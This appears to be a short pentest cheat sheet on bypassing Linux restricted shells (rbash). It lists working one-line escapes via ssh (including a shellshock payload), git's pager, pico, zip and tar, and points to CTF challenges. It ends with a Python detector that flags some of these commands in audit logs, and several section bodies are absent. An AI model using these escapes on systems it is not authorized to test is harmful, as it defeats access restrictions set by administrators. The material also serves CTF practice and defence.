




An in-depth exploration of Linux Restricted Shells, their usage, and various techniques to bypass them. It covers enumeration of the Linux environment, common exploitation techniques, programming languages techniques, and advanced techniques. The document also includes practical examples and references to CTF challenges.
By @n4ckhcker & @h4d3sw0rm
[1] Introduction
[2] Enumeration Linux Environment
[3] Common Exploitation Techniques
[4] Programming Languages Techniques
[5] Advanced Techniques
[6] Time to Practice
Enumeration is the most important part. We need to enumerate the Linux environment to check what we can do to bypass rbash. We need to enumerate:
Now let's see some of the common exploitation techniques.
Now let's move into some dirty advanced techniques.
1) From ssh > ssh username@IP -t "/bin/sh" or "/bin/bash"
2) From ssh2 > ssh username@IP -t "bash --noprofile"
3) From ssh3 > ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
4) From ssh4 > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
5) From git > git help status > you can run it then !/bin/bash
6) From pico > pico -s "/bin/bash" then you can write /bin/bash and then CTRL + T
7) From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
8) From tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
C SETUID SHELL :
Root-me has an INSANE rbash bypass challenge! https://www.root-me.org/en/Challenges/App-Script/Restricted-shells
Hackthebox solidstate machine! (Easy) https://www.hackthebox.eu/
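
A defender-side check for the locally run commands in the advanced techniques list (items 4 to 8), as an added example that is not part of the original notes: it flags those invocations in exec audit records of restricted-shell accounts. The (account, command line) record shape, the rule names and the sample lines are constructed assumptions.

```python
import shlex

def classify(cmdline):
    """Return the names of the rules one logged command line trips."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: surface the line, do not skip it
        return ["unparseable"]
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]   # /usr/bin/tar and tar are the same program
    args = argv[1:]
    hits = []
    if prog == "ssh" and any("proxycommand" in a.lower() for a in args):
        hits.append("ssh-proxycommand")          # covers -o X=... and -oX=...
    elif prog == "git" and args[:1] == ["help"]:
        hits.append("git-help-pager")            # help opens a pager with "!" commands
    elif prog in ("pico", "nano") and any(
            a == "-s" or a.startswith("--speller") for a in args):
        hits.append("editor-alternate-speller")
    elif prog == "zip" and any(a.startswith("--unzip-command") for a in args):
        hits.append("zip-unzip-command")
    elif prog == "tar" and any(
            a.startswith("--checkpoint-action=exec") for a in args):
        hits.append("tar-checkpoint-exec")
    return hits

# Constructed sample: (account, command line) pairs for a restricted account.
SAMPLE = [
    ("rbuser", 'ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1'),
    ("rbuser", "git help status"),
    ("rbuser", 'zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"'),
    ("rbuser", "/usr/bin/tar cf /dev/null testfile --checkpoint=1 "
               "--checkpoint-action=exec=/bin/bash"),
    ("rbuser", "tar cf /tmp/backup.tar docs"),   # benign archive job
    ("rbuser", "git status"),                    # benign, no pager-backed help
]

def scan(events):
    """Keep only the events that trip at least one rule."""
    return [(u, c, h) for u, c in events if (h := classify(c))]

if __name__ == "__main__":
    for user, cmd, hits in scan(SAMPLE):
        print(f"{user}: {','.join(hits)}: {cmd}")
```

A hit on any of these rules for an rbash account is also a signal to remove that binary from the account's allowed command directory.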